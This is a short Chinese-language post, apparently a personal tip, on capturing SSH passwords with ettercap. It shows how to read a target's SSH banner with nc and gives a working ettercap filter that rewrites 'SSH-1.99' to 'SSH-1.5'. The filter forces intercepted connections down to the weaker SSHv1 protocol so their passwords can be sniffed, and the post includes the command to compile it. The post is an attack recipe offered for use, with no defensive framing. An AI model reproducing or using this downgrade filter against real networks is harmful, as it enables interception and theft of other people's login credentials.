通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的，即使被嗅探的服务器被配置成了protcol 2,1也一样。

花了一会研究了下filter的写法，写了个ssh将ssh-1.99降到ssh-1.5的filter

if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){ 
 
replace("SSH-1.99","SSH-1.5"); 
 
} 

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter，看看，是不是能嗅了？